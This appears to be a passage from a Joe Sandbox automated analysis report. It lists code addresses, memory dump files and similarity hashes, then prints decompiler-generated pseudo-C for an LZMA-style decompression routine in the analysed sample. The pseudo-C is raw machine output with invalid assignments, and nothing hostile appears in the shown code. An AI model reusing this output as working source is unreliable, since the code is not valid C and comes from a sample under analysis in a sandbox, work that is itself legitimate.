0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a
0x00000000
0x00406ea1

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FBB() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
